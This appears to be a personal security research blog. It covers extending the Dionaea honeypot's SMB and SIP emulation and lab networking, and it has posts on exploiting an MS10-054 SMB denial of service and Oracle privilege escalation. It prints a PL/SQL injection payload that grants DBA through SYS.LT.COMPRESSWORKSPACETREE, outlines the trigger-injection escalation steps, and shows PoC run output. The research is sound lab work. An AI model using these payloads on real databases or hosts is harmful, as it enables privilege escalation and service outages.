ATSVC support for Dionaea

For SMB/NETBIOS hacking, one of the usual ways to execute the payload in remote machine is via Task Scheduler. In Windows environment, we could use the 'at' command to schedule the related tasks on specific time. AT command can be executed, for example:

To view the scheduled task on remote machine :
-at \\ip

To scheduled the task on 2300 hours on the remote machine:
-at \\ip 23:00 command

Recently, I take a look on the possibilities to add the ATSVC service support for Dionaea as mentioned by Markus in his blog when observed over MS11-020 vulnerability http://carnivore.it/2011/04/19/rumors. As usual procedure, with a couple of checks over MSDN and wireshark, it is interesting to observe the different between legitimate connection and Dionaea response.

Legitimate SMB connection over 2 Windows machine:
1. Negotiate Procol Request/Response
2. Session Setup AndX Request/Response with NTLMSSP authentication
3. Tree Connect AndX Request/Response
4. NT Create AndX Request/Response
5. Trans2 Request/Response......

Connection between a Windows machine and Dionaea:
1. Negotiate Protocol Request/Response
2. Session Setup AndX Request/Response with NTLMSSP authentication
3. Tree Connect AndX Request/Response
4. Tree Disconnect Request/Response

The connection would terminated after this response. How can it be?!

I spent quite some time to figure out the root cause for the issue, by checking every single packet layer, field value and etc. With quite a long time of tweaking and troubleshooting, upon the edge of nearly giving up, the NBNS queries and response which transfered even before the SMB negotiation caught my attention. I noticed that at.exe would need to have NETBIOS protocol support, which currently not available for Dionaea. Dionaea mainly support for SMB procotol which is run on Port TCP/445, whereas at.exe would require the NETBIOS support which run on port UDP/137.

To execute at.exe remotely over the network, the normal connection flow as below :
1. NBNS queries/responses
2. Negotiate Procol Request/Response
3. Sssion Setup AndX Request/Response with NTLMSSP authentication
4. Tree Connect AndX Request/Response
.....[continue]

At the initial stage, several NBSN (NETBIOS Name Services) queries will be communicated on port UDP/137 prior the SMB negotiation took place. I believe that at.exe as one of the legacy binary which existed since Window NT, would depend on NBSN queries to determine the continuity of the further action. The culprit found.

Screenshot:
Legitimate connection of 2 windows hosts

Failed connetion of Windows host and Dionaea


Move on.

Dionaea SIP module test

Here is the listing of my test of Dionaea SIP module with sipvicious. Tool sipvicious is one of the de-facto sip auditing tool based VOIP system. The testing has performed with svmap.py and specifying the some common scanning method that supported by a legitimate VOIP system.

I have listed the sipvicious output,followed by Dionaea response of each method:


C:\sipvicious>python svmap.py -s session1 -v 192.168.56.101
INFO:DrinkOrSip:Db does sync
INFO:DrinkOrSip:trying to get self ip .. might take a while
INFO:root:start your engines
INFO:DrinkOrSip:unknown:unknown -> 192.168.56.101:5060 -> unknown
-> 3CXPhoneSystem
INFO:root:we have 1 devices
| SIP Device | User Agent | Fingerprint |
-----------------------------------------------------
| 192.168.56.101:5060 | unknown | 3CXPhoneSystem |

INFO:root:Total time: 0:00:03.223000

C:\sipvicious>python svmap.py -m OPTIONS 192.168.56.10
| SIP Device | User Agent | Fingerprint |
-----------------------------------------------------
| 192.168.56.101:5060 | unknown | 3CXPhoneSystem |

C:\sipvicious>python svmap.py -m CANCEL 192.168.56.101
| SIP Device | User Agent | Fingerprint
|
--------------------------------------------------------------------------------
-----------
| 192.168.56.101:5060 | unknown | Viceroy 1.2 / T-Com Speedport W500V / Firmw
are v1.37 |
| | | MxSF/v3.2.6.26 / ET747-a3
|

[14012011 00:11:13] sip dionaea/sip.py:1118: Received CANCEL
[14012011 00:11:15] connection connection.c:3825: connection 0x9b35cb8 none/udp/none [192.168.56.101:5060->192.168.56.1:5060] state: none->close
[14012011 00:11:15] connection connection.c:3825: connection 0x9b35cb8 none/udp/close [192.168.56.101:5060->192.168.56.1:5060] state: close->close
[14012011 00:11:15] logsql dionaea/logsql.py:574: attackid 21567 is done

Note : Wireshark show the malformed packet.


C:\sipvicious>python svmap.py -m REGISTER 192.168.56.101
WARNING:root:found nothing

C:\sipvicious>python svmap.py -m INVITE 192.168.56.101
WARNING:root:found nothing
[14012011 00:08:33] sip dionaea/sip.py:833: SIP Session created
[14012011 00:08:33] sip dionaea/sip.py:975: Received INVITE
[14012011 00:08:33] sip dionaea/sip.py:1183: Mandatory header content-type not in message

C:\sipvicious>python svmap.py -m ACK 192.168.56.101
WARNING:root:found nothing
[14012011 00:10:55] sip dionaea/sip.py:833: SIP Session created
[14012011 00:10:55] sip dionaea/sip.py:1061: Received ACK
[14012011 00:10:55] sip dionaea/sip.py:1069: Given Call-ID does not belong to any session: exit

C:\sipvicious>python svmap.py -m BYE 192.168.56.101
WARNING:root:found nothing
[14012011 00:12:42] sip dionaea/sip.py:833: SIP Session created
[14012011 00:12:42] sip dionaea/sip.py:1101: Received BYE
[14012011 00:12:42] sip dionaea/sip.py:1109: Given Call-ID does not belong to any session: exit

C:\sipvicious>python svmap.py -m PRACK 192.168.56.101
WARNING:root:found nothing

C:\sipvicious>python svmap.py -m SUBSCRIBE 192.168.56.101
WARNING:root:found nothing

C:\sipvicious>python svmap.py -m NOTIFY 192.168.56.101
WARNING:root:found nothing

C:\sipvicious>python svmap.py -m PUBLLISH 192.168.56.101
WARNING:root:found nothing

C:\sipvicious>python svmap.py -m INFO 192.168.56.101
WARNING:root:found nothing

C:\sipvicious>python svmap.py -m REFER 192.168.56.101
WARNING:root:found nothing

C:\sipvicious>python svmap.py -m UPDATE 192.168.56.101
WARNING:root:found nothing

C:\sipvicious>python svmap.py -m MESSAGE 192.168.56.101
WARNING:root:found nothing

[14012011 00:16:27] sip dionaea/sip.py:966: Unknown SIP header (supported: INVITE, ACK, OPTIONS, BYE, CANCEL, REGISTER and SIP responses

From the quick these, the current Dionaea SIP module managed to support OPTIONS and CANCEL method well. Several SIP method can be improved for DIonaea SIP module such as INVITE, ACK, BYE, REGISTER, which include the support of the request and reply with the correct response. I will work on it soon.

Reference:
How to use svmap
http://code.google.com/p/sipvicious/wiki/SvmapUsage
List of SIP request methods
http://en.wikipedia.org/wiki/SIP_Requests

MS10-054 Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS

Another SMB protocol vulnerability that catch my eye these few days - MS10-054 Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS. My curiosity as the same : How it work?

This vulnerability has first discovered Laurent Gaffié in early 2010. He also discovered the issue in ms10-020 vulnerability previously. Summary from the advisory :

"A vulnerability in the Windows kernel can be triggered via SMB in Microsoft
Windows versions ranging from Windows 2000 through to Windows 7. This vulnerability allows an attacker to trigger a kernel pool corruption by sending a specially crafted SMB_COM_TRANSACTION2 request.Successful exploitation of this issue may result in remote code execution with kernel privileges, while failed attempts will result in a Denial of Service condition. Microsoft haspublished a patch to resolve the issue"

What is SMB_COM_TRANSACTION2 ?
From [MS-CIFS].pdf, SMB_COM_TRANSACTION2 subcommands provide support for a richer set of server-side file system semantics. The "Trans2 subcommands", as they are called, allow clients to set and retrieve Extended Attribute key/value pairs, make use of long file names (longer than the original 8.3 format names), and perform directory searches, among other tasks.

The subcommand can be find in http://manubatbat.free.fr/doc/smb/6.2.htm

The original SMB_COM_TRANSACTION2 request is in this format :

SMB_Parameters
{
UCHAR WordCount;
Words
{
USHORT TotalParameterCount;
USHORT TotalDataCount;
USHORT MaxParameterCount;
USHORT MaxDataCount;
UCHAR MaxSetupCount;
UCHAR Reserved1;
USHORT Flags;
ULONG Timeout;
USHORT Reserved2;
USHORT ParameterCount;
USHORT ParameterOffset;
USHORT DataCount;
USHORT DataOffset;
UCHAR SetupCount;
UCHAR Reserved3;
USHORT Setup[SetupCount];
}
}
SMB_Data
{
USHORT ByteCount;
Bytes
{
SMB_STRING Name;
UCHAR Pad1[];
UCHAR Trans2_Parameters[ParameterCount];
UCHAR Pad2[];
UCHAR Trans2_Data[DataCount];
}
}

How MS10-054 works?
The culprit is the MaxDataCount field! It indicates the maximum number of data bytes that the client will accept in the transaction reply. Windows will allocate a pool chunk with the MaxDataCount size without any sanity check. By allocating ZERO size of pool chunk, it could be a trouble if freeing the memory chunk.

PoC can be found in the full disclosure adviosry http://seclists.org/fulldisclosure/2010/Aug/122 . I have try to test the PoC and it work with the target machine is in "WORKGROUP" domain and has a user namey "Y0" (0 is the zero).

C:\Python26>python.exe test.py 192.168.56.101 C
[+]Negotiate Protocol Request sent
[+]Session Query sent

C:\Python26>python.exe test.py 192.168.56.101 C
[+]Negotiate Protocol Request sent
[+]Session Query sent
[+]Malformed Trans2 packet sent
[+]The target should be down now

C:\Python26>

And the WinXP VM freezee...

For the PoC packet, we can clearly see the culprint "MaxDataCount = 0".

After all, the working exploit has included in metasploit modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb

VirtualBox and Vmware network setup

Just figure out this.

1. Connect Virtual Box images and VMware Player Images.

Settings
Virtual Box - VirtualBox Host-Only Ethernet Adapter
Vmware's setting in vmnetcfg.exe : Bridged to VirtualBox Host-Only Ethernet Adapter
Vmware image : Network connection: Bridged

It works! All images can ping each other well. The IP that assigned for the VM images
- Host Machine : 192.168.56.1
- VirtualBox Ubuntu 9.04 image : 192.168.56.101
- VirtualBox Ubuntn 9.10 image : 192.168.56.102
- VMWare Backtrack image : 192.168.56.103

The traffic between images can be captured with wireshark that set to the VirtualBox Host-Only adapter. Another drawback that is the internet connection not work for all images, although the Host Machine able to acccess internet well.

Lets' improve

2. Create internal network for 2 VirtualBox images + internet

Setttings
Virtual Box Ubuntu 9.04 image
- Enable 2 Network Adapters
- Setting for Adapter 1 : NAT
- Setting for Adapter 2 :

 Attached to "Internal Network", Name:"intnet"
 IP setting: 192.168.4.1
 Subnet mask : 255.255.255.0
 Gateway : 10.0.3.2 ( which same as the NAT gateway)

Virtual Box Ubuntu 9.10 image
- Enable 2 Network Adapters
- Setting for Adapter 1 : NAT
- Setting for Adapter 2 :

 Attached to "Internal Network", Name:"intnet"
 IP setting : 192.168.4.2
 Subnet mask : 255.255.255.0
 Gateway : 10.0.3.2 ( which same as the NAT gateway)

Both images can access internet and ping each others, and most importantly it is the internal network. The network packets cannot captured with wireshark listening on Host Machine, unless the wireshark is listening inside VM images.

Reference
https://opensourceexperiments.wordpress.com/2008/04/13/case-study-configuring-internal-networking-work-for-talking-two-linux-guest-os-ubuntu-on-windows-vista-host/

Simple steps to improve Dionaea SMB stack

SMB protocol is one of the core protocol that supported by Dionaea. The attacks on Port 445 will be received and logged in the sqlite database. Dioanea emulates SMB protocol and the related functions in SMB stack have written in Python. If you are running Dionaea and you found the unsupported RPC calls, you are most welcomed to improve Dionaea's SMB stack.

This is my work out. The process:
1. Dig out the unsupported function, in this case is the unsupported RPC call
2. Refer to MSDN Library for further detail about the function call
3. Find the application/test suite that can trigger the function well. Observe the original request and reply of the function, by using a clean Windows Image
4. Code it out!
5. Test, debug, test, debug, BINGO!!
6. Commit to the tree

Example:
1. Recently I found that this lines always appear in /opt/dionaea/var/log/dionaea.log, and I realised this unsupported RPC SRVSVC call with Opnum 21 hit my sensor frequently.

[13112010 09:02:07] rpcservices dionaea/smb/rpcservices.py:104-info: 
Unknown RPC Call to SRVSVC 21
.....
[13112010 12:21:37] rpcservices dionaea/smb/rpcservices.py:104-info: 
Unknown RPC Call to SRVSVC 21
.....
[13112010 13:38:34] rpcservices dionaea/smb/rpcservices.py:104-info: 
Unknown RPC Call to SRVSVC 21
.....

With the query to database /opt/dionaea/var/dionaea/logsql.sqlite, 68 hits of such unsupported RPC call attacked the sensor that running not more than 72 hours.
Here the database query result:

COUNT(*) | dcerpcrequest_uuid | dcerpcrequest_opnum | dcerpcservice_name 
68   4b324fc8-1670-01d3-1278-5a47bf6ee188 21     SRVSVC 
1   12345778-1234-abcd-ef00-0123456789ac 34     samr 

2. Refer to MSDN Library http://msdn.microsoft.com/en-us/library/cc247243%28v=PROT.13%29.aspx, it is the NetServerGetInfo method which used to retrieve current configuration information for the targeted server. The method structure quite simple:

NET_API_STATUS NetrServerGetInfo(
  [in, string, unique] SRVSVC_HANDLE ServerName,
  [in] DWORD Level,
  [out, switch_is(Level)] LPSERVER_INFO InfoStruct
);

3. With some googling time, I managed to find the way that I can observe the original request and response of such NetServerGetInfo method. Here the simple Win32 program that can be used to test the NetServerGetInfo method. It worked well with a clean WindowsXP image as target and packet detail can be studied with Wireshark.
http://www.installsetupconfig.com/win32programming/networkmanagementapis16_49.html

Note: To make this simple program work, the targeted WindowsXP need Guest account to be enabled. This spend me quite some time to figure it out as the System error 17XX keep appeared.

4. It is the time to code the method and let Dionaea support it! The RPC methods has resided in http://src.carnivore.it/dionaea/tree/modules/python/scripts/smb/rpcservices.py and it seperated clearly in classes such as ATSVC, DCOM, IOXIDResolver,lsarpc and others. Find the SRVSVC class and define the NetServerGetInfo handler.

5. Test the code with the Win32 program that compiled previously. Observed the packet in Wireshark. Test, debug, test, debug.. and it worked well as similiar with the Windows image. Further code test can be done by put it into the real network. The code works!

Observation with readlogsqltree.py

2010-11-14 10:30:16
  connection 21150 pcap tcp reject 192.168.1.50:139 <- 118.X.180.91:47775
2010-11-14 10:30:16
  connection 21151 smbd tcp accept 192.168.1.50:445 <- 118.X.180.91:47774
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' 
    (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' 
    (SRVSVC) opnum 15 (NetShareEnum ())
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' 
    (SRVSVC) opnum 21 (NetServerGetInfo ())

Waiting next coming attack :)

6. Commit to the tree. Example : http://src.carnivore.it/dionaea/commit/?id=974002a510a13f4565d58b458da665bd4e165e7c

7. After the commit, the added handler need to observe from time to time. Sometime the real world attack will be different from what what have coded. It need minor changes in certain packet field to make it work.

This is one of the ways to improve SMB stack. Simple and exciting. Feel free to write yours. If you need the git tree access, feel free to contact Markus nepenthesdev@gmail.com


Cheers,

Oracle Indirect Privilege Escalation Attack

When come across this issues, the interesting part that catch my attention is the Indirect process. To me, i love the creativitiy! Let dive in with some basic understanding about Oracle.

What is Trigger in Oracle and how it works?
A trigger is a named PL/SQL unit that is stored in the database and executed (fired) in response to a specified event that occurs in the database.

It can be fired at exactly one of the following timing points:
--Before the triggering statement executes
--After the triggering statement executes
--Before each row that the triggering statement affects
--After each row that the triggering statement affects

The interesting trigger is the type with 'Before the triggering statement executes'. The Trigger will be executed even the triggering statemet failed. For example, a trigger has setup to be fired when 'drop table' command has executed. If restricted user try to launch the 'drop table' command and he will end up with insufficient privilege or acces denied. But the Trigger will be fired since it a "before" trigger. Such a unique feature has creatively exploited, and the exploitation turned into Indirect privilege escalation or so called 2-stages attack.

How Oracle Indirect privilege escalation works?
Let start to look at how 2-stages attack works. The real example happened in the case CVE-2009-0981 Oracle 10g MDSYS.SDO_TOPO_DROP_FTBL SQL Injection vulnerability.

Finding the culprit
1. Indentify who is the DBA, and the table owned by the him which granted the PUBLIC permission to insert into. Eg, SYSTEM.OL$ table, SYSTEM.DEF$_TEMP$LOB
2. Identify the user who posses the "CREATE ANY TRIGGER" privilege, for example MDSYS, this means MDSYS allows to create a trigger in any schema, expect to the objects that belongs to SYS.
3. Find any vulnerable trigger under the user, so we can inject code into it, for example MDSYS.SDO_TOPO_DROP_FTBL trigger which fired with "DROP TABLE" command. The trigger is vulnerable to code injection

1st stage
4. Inject crafted code into the vulnerable trigger, and execute it. For example, "DROP TABLE and 1=(scot.z)"

2nd stage
5. The crafted code (scot.z) will create our Trigger under SYSTEM schema, for example, our Trigger is the "before" trigger for the INSERT INTO TABLE statement. The trigger has crafted to execute with "AUTHID CURRENT_USER", that means it follows the table's owner role, which is DBA
6. Execute the command that need to fire the Trigger, for example "insert into system.DEF$_TEMP$LOB..."
7. Our trigger fired and the DBA role obtained!

Attention
Again, this attack not working with Oracle XE, as the difference between standard edition and XE.

Reference
It is good to study the msf code and clear several doubts in my head about the working mechanism
http://www.metasploit.com/modules/auxiliary/sqli/oracle/droptable_trigger
http://www.red-database-security.com/exploits/oracle_mdsys_sdo_topo_drop_ftbl.html

Oracle XE Express Edition

Recently I have to deal with Oracle XE Express Edition, and it is the right time to take some note down after doing tons of reading about the topic, especially the long study to get the difference between Oracle and Oracle XE.

Introduction
How to check the version number of an Oracle database?
(a) Use OUI (Oracle Universal Installer)
(b) select * from v$version;

What Is the Relation of a User Account and a Schema?
User accounts and schemas have a one-to-one relation. When you create a user, you are also implicitly creating a schema for that user. A schema is a logical container for the database objects (such as tables, views, triggers, and so on) that the user creates. The schema name is the same as the user name, and can be used to unambiguously refer to objects owned by the user.

Exploitation
1. CVE-2009-0981 Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Vulnerability
After the installation of fresh Oracle XE, I tried to play with CVE-2009-0981 Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection vulnerability. The exploit code from http://www.red-database-security.com/exploits/oracle_sys_lt_compressworkspacetree2.html.

The issue is about the COMPRESSWORKSPACETREE procedure sanitation issues and we can inject code into the proceduce and privilege escalation will success. The procedure has owned by SYS or WMSYS

The returned result always fail for me after several tries.

C:\Users>sqlplus

SQL*Plus: Release 10.2.0.1.0 - Production on Sat Oct 30 23:57:21 2010

Copyright (c) 1982, 2005, Oracle.  All rights reserved.

Enter user-name: user1
Enter password:

Connected to:
Oracle Database 10g Express Edition Release 10.2.0.1.0 - Production

SQL> DECLARE
  2  D NUMBER;
  3  BEGIN
  4  D := DBMS_SQL.OPEN_CURSOR;
  5  DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; 
     begin execute immediate ''grant dba to scott'';commit;end;',0);
  6  SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
  7  SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
  8  end;
  9  /
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
*
ERROR at line 6:
ORA-06550: line 6, column 1:
PLS-00201: identifier 'SYS.LT' must be declared
ORA-06550: line 6, column 1:
PL/SQL: Statement ignored
ORA-06550: line 7, column 1:
PLS-00201: identifier 'SYS.LT' must be declared
ORA-06550: line 7, column 1:
PL/SQL: Statement ignored

After several google time, I only realise there are big difference between Oracle Standard Edition and XE from http://www.dba-oracle.com/t_xe_features_oracle_express.htm. For the case, COMPRESSWORKSPACETREE procedure belongs to LT packages under Oracle Workspace Manager. Unfortunately Oracle Workspace Manager not exists in Oracle XE! This is the reason why the exploit has failed and the vulnerability not even exist in Oracle XE.

Clear. Let move on!

2. SQL Injection via Oracle DBMS_EXPORT_EXTENSION in Oracle 9i / 10g
The vulnerability has found in Year 2006 and I gues it cant be find in wild now. But good news is the Oracle never have any Critical Patch Unit (CPU) for Oracle XE. So, this vulnerability exists and the exploit worked well!

Further details about this issues please refer to http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html

My favor
To summarise the oracle exploitation methodology, this is my favor and one of the most comprehensive cheat sheet
http://www.red-database-security.com/wp/oracle_cheat.pdf
http://www.red-database-security.com/wp/hacking_and_hardening_oracle_XE.pdf